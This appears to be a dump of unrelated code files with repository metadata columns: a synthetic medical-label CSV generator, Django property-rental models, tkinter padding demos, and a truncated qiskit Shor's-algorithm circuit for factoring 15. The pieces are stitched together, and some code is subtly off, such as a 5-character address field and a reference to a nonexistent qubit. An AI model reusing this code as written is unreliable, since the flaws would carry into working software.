feats.extend([str(int(blood == 0)), str(int(blood == 1)), str(int(blood == 2)), str(int(blood == 3))])
LT2 = random.random()
feats.extend([str(LT2)])
label = 0
if (age > 18) and (gender == 1) and (blood == 3) and (LT2 > 0.6):
label = 1
if (age > 18) and (gender == 0) and (blood == 2) and (LT2 > 0.5):
label = 1
if (age <= 18) and (LT2 > 0.9):
label = 1
if random.random() < 0.001:
label = 1 - label
feats.append(str(label))
out.write(','.join(feats) + '\n')
out.close()
out = open('test.csv', 'w')
out.write('age,gender=Male,gender=Female,LT1=A,LT1=B,LT1=O,LT1=AB,LT2,label\n')
for i in range(N // 2):
feats = []
age = random.randint(1, 60)
feats.append(str(age))
gender = random.randint(0, 1)
feats.extend([str(gender), str(1 - gender)])
blood = random.randint(0, 3)
feats.extend([str(int(blood == 0)), str(int(blood == 1)), str(int(blood == 2)), str(int(blood == 3))])
LT2 = random.random()
feats.extend([str(LT2)])
label = 0
if (age > 18) and (gender == 1) and (blood == 3) and (LT2 > 0.6):
label = 1
if (age > 18) and (gender == 0) and (blood == 2) and (LT2 > 0.5):
label = 1
if (age <= 18) and (LT2 > 0.9):
label = 1
feats.append(str(label))
out.write(','.join(feats) + '\n')
out.close()
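The label logic is duplicated across the train and test loops above; written out once, the ground-truth rule the generator encodes is the following (illustrative restatement, not part of the script):

# Ground-truth rule encoded by the generator (before the 0.1% label
# noise that is applied only to the training set)
def true_label(age, gender, blood, LT2):
    if age > 18 and gender == 1 and blood == 3 and LT2 > 0.6:
        return 1
    if age > 18 and gender == 0 and blood == 2 and LT2 > 0.5:
        return 1
    if age <= 18 and LT2 > 0.9:
        return 1
    return 0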
| 27.367647
| 107
| 0.511553
| 280
| 1,861
| 3.4
| 0.175
| 0.05042
| 0.092437
| 0.063025
| 0.905462
| 0.905462
| 0.905462
| 0.905462
| 0.905462
| 0.905462
| 0
| 0.079087
| 0.293391
| 1,861
| 68
| 108
| 27.367647
| 0.644867
| 0
| 0
| 0.816327
| 0
| 0.040816
| 0.087465
| 0.073538
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020408
| 0
| 0.020408
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa011c8b73ab890f35b0fd49e77a607a54bac1e2
| 4,103
|
py
|
Python
|
src/propertyrentals/models.py
|
kaizer88/moltrandashboad
|
590b3426ecc3a80aa31a08eb07bed224d0c2562d
|
[
"MIT"
] | null | null | null |
src/propertyrentals/models.py
|
kaizer88/moltrandashboad
|
590b3426ecc3a80aa31a08eb07bed224d0c2562d
|
[
"MIT"
] | 4
|
2021-04-08T22:01:45.000Z
|
2021-09-22T19:50:53.000Z
|
src/propertyrentals/models.py
|
kaizer88/moltrandashboad
|
590b3426ecc3a80aa31a08eb07bed224d0c2562d
|
[
"MIT"
] | null | null | null |
from django.db import models
from lib.models import BaseModel
# Create your models here.
class Country(models.Model):
name = models.CharField(max_length=255, unique=True, null=False, blank=False)
code = models.CharField(max_length=5, unique=True, null=False, blank=False)
def __str__(self):
return self.code
class Province(models.Model):
name = models.CharField(max_length=255, unique=True, null=False, blank=False)
code = models.CharField(max_length=5, unique=True, null=False, blank=False)
country = models.ForeignKey('Country', on_delete=models.CASCADE, null=False, blank=False)
def __str__(self):
return self.name
class Town(models.Model):
name = models.CharField(max_length=255, unique=True, null=False, blank=False)
code = models.CharField(max_length=5, unique=True, null=False, blank=False)
province = models.ForeignKey('Province', on_delete=models.CASCADE, null=False, blank=False)
def __str__(self):
return self.name
class Property(BaseModel):
name = models.CharField(max_length=255, unique=True, null=False, blank=False)
code = models.CharField(max_length=5, unique=True, null=False, blank=False)
address = models.CharField(max_length=5, unique=True, null=False, blank=False)
def __str__(self):
return self.code
class Address(models.Model):
property = models.ForeignKey(
'Property', related_name="property_addresses", on_delete=models.CASCADE, null=False, blank=False)
address_line_one = models.CharField(max_length=255, null=True, blank=True)
address_line_two = models.CharField(max_length=255, null=True, blank=True)
postal_code = models.CharField(max_length=255, null=True, blank=True)
town = models.ForeignKey('Town', on_delete=models.CASCADE, null=False, blank=False)
province = models.ForeignKey('Province', on_delete=models.CASCADE, null=False, blank=False)
country = models.ForeignKey('Country', on_delete=models.CASCADE, null=False, blank=False)
def __str__(self):
return self.address_line_one
class Tenant(BaseModel):
first_name = models.CharField(max_length=255, unique=True, null=False, blank=False)
last_name = models.CharField(max_length=255, unique=True, null=False, blank=False)
id_number = models.CharField(max_length=255, unique=True, null=False, blank=False)
cell_number = models.IntegerField(null=True, blank=True)
email = models.CharField(max_length=50, null=True, blank=True)
kin_number = models.IntegerField(null=True, blank=True)
kin_first_name = models.CharField(max_length=30, null=True, blank=True)
kin_last_name = models.CharField(max_length=30, null=True, blank=True)
property = models.ForeignKey('Property', on_delete=models.CASCADE, null=False, blank=False, related_name="property_tenant")
def __str__(self):
return self.first_name
class Agent(BaseModel):
first_name = models.CharField(max_length=255, unique=True, null=False, blank=False)
last_name = models.CharField(max_length=255, unique=True, null=False, blank=False)
id_number = models.CharField(max_length=255, unique=True, null=False, blank=False)
cell_number = models.IntegerField(null=True, blank=True)
email = models.CharField(max_length=50, null=True, blank=True)
kin_number = models.IntegerField(null=True, blank=True)
kin_first_name = models.CharField(max_length=30, null=True, blank=True)
kin_last_name = models.CharField(max_length=30, null=True, blank=True)
town = models.ForeignKey('Town', related_name="town_agent", on_delete=models.CASCADE, null=False, blank=False)
def __str__(self):
return self.first_name
class Profile(models.Model):
name = models.CharField(max_length=150, null=False, blank=False)
surname = models.CharField(max_length=150, null=False, blank=False)
initials = models.CharField(max_length=150, null=False, blank=False)
age = models.IntegerField(null=False, blank=False)
date_of_birth = models.CharField(max_length=150, null=False, blank=False)
def __str__(self):
return self.name
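A quick sketch of how the location hierarchy above chains together: the foreign keys run Country -> Province -> Town, so an Address needs the full chain to exist first. All field values below are made up for illustration:

# Hypothetical shell session against these models
country = Country.objects.create(name='Zimbabwe', code='ZW')
province = Province.objects.create(name='Harare', code='HR', country=country)
town = Town.objects.create(name='Harare', code='HR1', province=province)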
| 43.648936
| 127
| 0.737265
| 573
| 4,103
| 5.099476
| 0.109948
| 0.143737
| 0.172485
| 0.229979
| 0.863792
| 0.857632
| 0.857632
| 0.852498
| 0.785079
| 0.683436
| 0
| 0.019302
| 0.14136
| 4,103
| 94
| 128
| 43.648936
| 0.810105
| 0.005849
| 0
| 0.632353
| 0
| 0
| 0.023786
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.029412
| 0.117647
| 0.985294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
fa6a784cc54793b1609c21b911ed01ab2cdb21fc
| 211
|
py
|
Python
|
utils/__init__.py
|
xyguo/trimmedEM
|
c350c0f1cabd54bfefcc79ba71f16fdeee9fee36
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
xyguo/trimmedEM
|
c350c0f1cabd54bfefcc79ba71f16fdeee9fee36
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
xyguo/trimmedEM
|
c350c0f1cabd54bfefcc79ba71f16fdeee9fee36
|
[
"MIT"
] | null | null | null |
from .grader import gaussian_mixture_grad, regression_mixture_grad, GMMGrader, MRMGrader
__all__ = ['gaussian_mixture_grad',
'regression_mixture_grad',
'GMMGrader',
'MRMGrader']
| 35.166667
| 88
| 0.696682
| 20
| 211
| 6.75
| 0.5
| 0.325926
| 0.281481
| 0.42963
| 0.859259
| 0.859259
| 0.859259
| 0.859259
| 0
| 0
| 0
| 0
| 0.218009
| 211
| 6
| 89
| 35.166667
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0.292453
| 0.207547
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fa6bd1df1195504d8d4979c2bc0b94f51749c797
| 851
|
py
|
Python
|
PaddingLocation.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
"bzip2-1.0.6"
] | null | null | null |
PaddingLocation.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
"bzip2-1.0.6"
] | null | null | null |
PaddingLocation.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
"bzip2-1.0.6"
] | null | null | null |
# Four small tkinter demos showing how fill, padx, pady and side affect
# label placement. Each label is given its window explicitly, so the
# demos keep working after the previous root window has been closed.
from tkinter import *
# 1. Labels stretched across the window, no padding
gui = Tk()
w = Label(gui, text="Bangalore", bg="red", fg="white")
w.pack(fill=X)
w = Label(gui, text="Karnataka", bg="green", fg="black")
w.pack(fill=X)
gui.mainloop()
# 2. Horizontal (external) padding with padx
root = Tk()
w = Label(root, text="Bangalore", bg="red", fg="white")
w.pack(fill=X, padx=10)
w = Label(root, text="Karnataka", bg="green", fg="black")
w.pack(fill=X, padx=10)
root.mainloop()
# 3. Vertical (external) padding with pady
gui = Tk()
w = Label(gui, text="Bangalore", bg="red", fg="white")
w.pack(fill=X, pady=10)
w = Label(gui, text="Karnataka", bg="green", fg="black")
w.pack(fill=X, pady=10)
gui.mainloop()
# 4. Padding combined with side=LEFT placement
gui = Tk()
w = Label(gui, text="Bangalore", bg="red", fg="white")
w.pack(padx=5, pady=10, side=LEFT)
w = Label(gui, text="Karnataka", bg="green", fg="black")
w.pack(padx=5, pady=20, side=LEFT)
gui.mainloop()
| 19.340909
| 57
| 0.60517
| 138
| 851
| 3.731884
| 0.202899
| 0.093204
| 0.135922
| 0.116505
| 0.866019
| 0.831068
| 0.8
| 0.8
| 0.737864
| 0.737864
| 0
| 0.019971
| 0.176263
| 851
| 43
| 58
| 19.790698
| 0.714693
| 0
| 0
| 0.821429
| 0
| 0
| 0.178218
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d70b8c49c7e6a1e50ad0599507d2af51f182e6c2
| 17,540
|
py
|
Python
|
shor.py
|
jorgebrandao/ShorAlgorithm
|
73187cb39380c2212e26a611d7cb2c2440625af8
|
[
"Apache-2.0"
] | null | null | null |
shor.py
|
jorgebrandao/ShorAlgorithm
|
73187cb39380c2212e26a611d7cb2c2440625af8
|
[
"Apache-2.0"
] | null | null | null |
shor.py
|
jorgebrandao/ShorAlgorithm
|
73187cb39380c2212e26a611d7cb2c2440625af8
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.append('qiskit-sdk-py-master')
from qiskit import QuantumProgram
from math import *
from qiskit.tools.visualization import plot_histogram
#####################HOW TO USE THE DIFFERENT GATES######################
#.x(qr[0]) #applying x gate to the first qubit
#.y(qr[0]) #applying y gate to the first qubit
#.z(qr[0]) #applying z gate to the first qubit
#.iden(qr[0]) #identity gate on the first qubit
#.u1(lambd, qr[0]) #applying a u1 gate to the first qubit
#.u2(phi, lambd, qr[0]) #applying a u2 gate to the first qubit
#.u3(theta, phi, lambd, qr[0]) #applying a u3 gate to the first qubit
#.h(qr[0]) #applying h gate to the first qubit
#.s(qr[0]) #applying s gate to the first qubit
#.sdg(qr[0]) #applying sdg gate to the first qubit
#.t(qr[0]) #applying t gate to the first qubit
#.tdg(qr[0]) #applying tdg gate to the first qubit
#.rx(theta, qr[0]) #applying rotation around x-axis gate to the first qubit
#.ry(theta, qr[0]) #applying rotation around y-axis gate to the first qubit
#.rz(phi, qr[0]) #applying rotation around z-axis gate to the first qubit
#.cx(qr[0], qr[1]) #applying cnot gate (from 1 to 0 (needs more testing...))
#.cy(qr[0], qr[1]) #controlled-y
#.cz(qr[0], qr[1]) #controlled-z
#.ch(qr[0], qr[1]) #controlled-h
#.crz(lambd, qr[0], qr[1]) #controlled rotation around-Z
#.cu1(lambd, qr[0], qr[1]) #controlled u1
#.cu3(theta, phi, lambd, qr[0], qr[1]) #controlled u3
#.swap(qr[0], qr[1]) #swapping the first and second qubits
#.ccx(qr[0], qr[1], qr[2]) #Toffoli gate
#.cswap(qr[0], qr[1], qr[2]) #swapping the second and third qubits controlled by the first qubit
def sh(g):
Q_program = QuantumProgram()
qr = Q_program.create_quantum_register("qr", 12)
cr = Q_program.create_classical_register("cr", 12)
qc = Q_program.create_circuit("superposition", [qr], [cr])
#x (0,1)
#y (2,3,4,5,6)
#b///adder (7,8,9,10,11)
    # auxiliary (12)
#a=4 = 0 1 0 0
#N=15 = 1 1 1 1
#a %N = 4*a**2 = 4 = 0 1 0 0
#2*a %N = 8 = 1 0 0 0
#4*a %N == a**2 %N = 1 = 0 0 0 1
#2*a**2 %N = 2 = 0 0 1 0
    #########phases
###N
#u2+u3+u4+u5 = 15*pi/16
#u1+u2+u3+u4 = 15*pi/8
#u1+u2+u3 = 7*pi/4
#u1+u2 = 3*pi/2
#u1 = pi
###a
#u3 = pi/4
#u2 = pi/2
#u1 = pi
###############begin###########
    #inputs
qc.h(qr[0])
qc.h(qr[1])
#qc.x(qr[0])
#qc.x(qr[1])
qc.x(qr[2])
########qft5 (7-11)
qc.h(qr[11])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/4, qr[10])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/8, qr[9])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/16, qr[8])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(pi/32, qr[7])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.h(qr[10])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/4, qr[9])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/8, qr[8])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(pi/16, qr[7])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.h(qr[9])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/4, qr[8])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(pi/8, qr[7])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.h(qr[8])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(pi/4, qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[7])
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
##########################################
    #add a mod N controlled on qubits 0 and 2
#qc.u1(pi/4, qr[7])
#qc.u1(pi/2, qr[8])
#qc.u1(pi, qr[9])
qc.u1(pi/8, qr[7])
qc.ccx(qr[0], qr[2], qr[7])
qc.u1(pi/8, qr[2])
qc.u1(pi/8, qr[0])
qc.u1(-pi/8, qr[7])
qc.ccx(qr[0], qr[2], qr[7])
qc.u1(pi/4, qr[8])
qc.ccx(qr[0], qr[2], qr[8])
qc.u1(pi/4, qr[2])
qc.u1(pi/4, qr[0])
qc.u1(-pi/4, qr[8])
qc.ccx(qr[0], qr[2], qr[8])
qc.u1(pi/2, qr[9])
qc.ccx(qr[0], qr[2], qr[9])
qc.u1(pi/2, qr[2])
qc.u1(pi/2, qr[0])
qc.u1(-pi/2, qr[9])
qc.ccx(qr[0], qr[2], qr[9])
##########################################
###invqft5
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
qc.h(qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(-pi/4, qr[7])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[8])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/8, qr[7])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(-pi/4, qr[8])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.h(qr[9])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/16, qr[7])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/8, qr[8])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(-pi/4, qr[9])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.h(qr[10])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/32, qr[7])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/16, qr[8])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/8, qr[9])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(-pi/4, qr[10])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.h(qr[11])
################################
    #controlled swap
qc.ccx(qr[0], qr[2], qr[7])
qc.ccx(qr[0], qr[7], qr[2])
qc.ccx(qr[0], qr[2], qr[7])
qc.ccx(qr[0], qr[3], qr[8])
qc.ccx(qr[0], qr[8], qr[3])
qc.ccx(qr[0], qr[3], qr[8])
qc.ccx(qr[0], qr[4], qr[9])
qc.ccx(qr[0], qr[9], qr[4])
qc.ccx(qr[0], qr[4], qr[9])
qc.ccx(qr[0], qr[5], qr[10])
qc.ccx(qr[0], qr[10], qr[5])
qc.ccx(qr[0], qr[5], qr[10])
qc.ccx(qr[0], qr[6], qr[11])
qc.ccx(qr[0], qr[11], qr[6])
qc.ccx(qr[0], qr[6], qr[11])
################################
    #cnot on qubit 7
qc.cx(qr[0], qr[7])
################################
########qft5 (7-11)
qc.h(qr[11])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/4, qr[10])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/8, qr[9])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/16, qr[8])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(pi/32, qr[7])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.h(qr[10])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/4, qr[9])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/8, qr[8])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(pi/16, qr[7])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.h(qr[9])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/4, qr[8])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(pi/8, qr[7])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.h(qr[8])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(pi/4, qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[7])
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
#######################################
#add a**2%N=1
#qc.u1(pi/16, qr[7])
#qc.u1(pi/8, qr[8])
#qc.u1(pi/4, qr[9])
#qc.u1(pi/2, qr[10])
#qc.u1(pi, qr[11])
qc.u1(pi/32, qr[7])
qc.ccx(qr[1], qr[2], qr[7])
qc.u1(pi/32, qr[2])
qc.u1(pi/32, qr[1])
qc.u1(-pi/32, qr[7])
qc.ccx(qr[1], qr[2], qr[7])
qc.u1(pi/16, qr[8])
qc.ccx(qr[1], qr[2], qr[8])
qc.u1(pi/16, qr[2])
qc.u1(pi/16, qr[1])
qc.u1(-pi/16, qr[8])
qc.ccx(qr[1], qr[2], qr[8])
qc.u1(pi/8, qr[9])
qc.ccx(qr[1], qr[2], qr[9])
qc.u1(pi/8, qr[2])
qc.u1(pi/8, qr[1])
qc.u1(-pi/8, qr[9])
qc.ccx(qr[1], qr[2], qr[9])
qc.u1(pi/4, qr[10])
qc.ccx(qr[1], qr[2], qr[10])
qc.u1(pi/4, qr[2])
qc.u1(pi/4, qr[1])
qc.u1(-pi/4, qr[10])
qc.ccx(qr[1], qr[2], qr[10])
qc.u1(pi/2, qr[11])
qc.ccx(qr[1], qr[2], qr[11])
qc.u1(pi/2, qr[2])
qc.u1(pi/2, qr[1])
qc.u1(-pi/2, qr[11])
qc.ccx(qr[1], qr[2], qr[11])
#add 2a**2 modN
#add 4a**2 modN = 4
#qc.u1(pi/4, qr[7])
#qc.u1(pi/2, qr[8])
#qc.u1(pi, qr[9])
qc.u1(pi/8, qr[7])
qc.ccx(qr[1], qr[4], qr[7])
qc.u1(pi/8, qr[4])
qc.u1(pi/8, qr[1])
qc.u1(-pi/8, qr[7])
qc.ccx(qr[1], qr[4], qr[7])
qc.u1(pi/4, qr[8])
qc.ccx(qr[1], qr[4], qr[8])
qc.u1(pi/4, qr[4])
qc.u1(pi/4, qr[1])
qc.u1(-pi/4, qr[8])
qc.ccx(qr[1], qr[4], qr[8])
qc.u1(pi/2, qr[9])
qc.ccx(qr[1], qr[4], qr[9])
qc.u1(pi/2, qr[4])
qc.u1(pi/2, qr[1])
qc.u1(-pi/2, qr[9])
qc.ccx(qr[1], qr[4], qr[9])
##########################################
###invqft5
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
qc.h(qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(-pi/4, qr[7])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[8])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/8, qr[7])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(-pi/4, qr[8])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.h(qr[9])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/16, qr[7])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/8, qr[8])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(-pi/4, qr[9])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.h(qr[10])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/32, qr[7])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/16, qr[8])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/8, qr[9])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(-pi/4, qr[10])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.h(qr[11])
################################
    #controlled swap
qc.ccx(qr[1], qr[2], qr[7])
qc.ccx(qr[1], qr[7], qr[2])
qc.ccx(qr[1], qr[2], qr[7])
qc.ccx(qr[1], qr[3], qr[8])
qc.ccx(qr[1], qr[8], qr[3])
qc.ccx(qr[1], qr[3], qr[8])
qc.ccx(qr[1], qr[4], qr[9])
qc.ccx(qr[1], qr[9], qr[4])
qc.ccx(qr[1], qr[4], qr[9])
qc.ccx(qr[1], qr[5], qr[10])
qc.ccx(qr[1], qr[10], qr[5])
qc.ccx(qr[1], qr[5], qr[10])
qc.ccx(qr[1], qr[6], qr[11])
qc.ccx(qr[1], qr[11], qr[6])
qc.ccx(qr[1], qr[6], qr[11])
################################
########qft5 (7-11)
qc.h(qr[11])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/4, qr[10])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/8, qr[9])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/16, qr[8])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(pi/32, qr[7])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.h(qr[10])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/4, qr[9])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/8, qr[8])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(pi/16, qr[7])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.h(qr[9])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/4, qr[8])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(pi/8, qr[7])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.h(qr[8])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(pi/4, qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[7])
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
################################
#add a**2%N=1
#qc.u1(pi/16, qr[7])
#qc.u1(pi/8, qr[8])
#qc.u1(pi/4, qr[9])
#qc.u1(pi/2, qr[10])
#qc.u1(pi, qr[11])
qc.u1(-pi/32, qr[7])
qc.ccx(qr[1], qr[2], qr[7])
qc.u1(-pi/32, qr[2])
qc.u1(-pi/32, qr[1])
qc.u1(pi/32, qr[7])
qc.ccx(qr[1], qr[2], qr[7])
qc.u1(-pi/16, qr[8])
qc.ccx(qr[1], qr[2], qr[8])
qc.u1(-pi/16, qr[2])
qc.u1(-pi/16, qr[1])
qc.u1(pi/16, qr[8])
qc.ccx(qr[1], qr[2], qr[8])
qc.u1(-pi/8, qr[9])
qc.ccx(qr[1], qr[2], qr[9])
qc.u1(-pi/8, qr[2])
qc.u1(-pi/8, qr[1])
qc.u1(pi/8, qr[9])
qc.ccx(qr[1], qr[2], qr[9])
qc.u1(-pi/4, qr[10])
qc.ccx(qr[1], qr[2], qr[10])
qc.u1(-pi/4, qr[2])
qc.u1(-pi/4, qr[1])
qc.u1(pi/4, qr[10])
qc.ccx(qr[1], qr[2], qr[10])
qc.u1(-pi/2, qr[11])
qc.ccx(qr[1], qr[2], qr[11])
qc.u1(-pi/2, qr[2])
qc.u1(-pi/2, qr[1])
qc.u1(pi/2, qr[11])
qc.ccx(qr[1], qr[2], qr[11])
################################
    #sub a mod N controlled on qubits 1 and 4
#qc.u1(pi/4, qr[7])
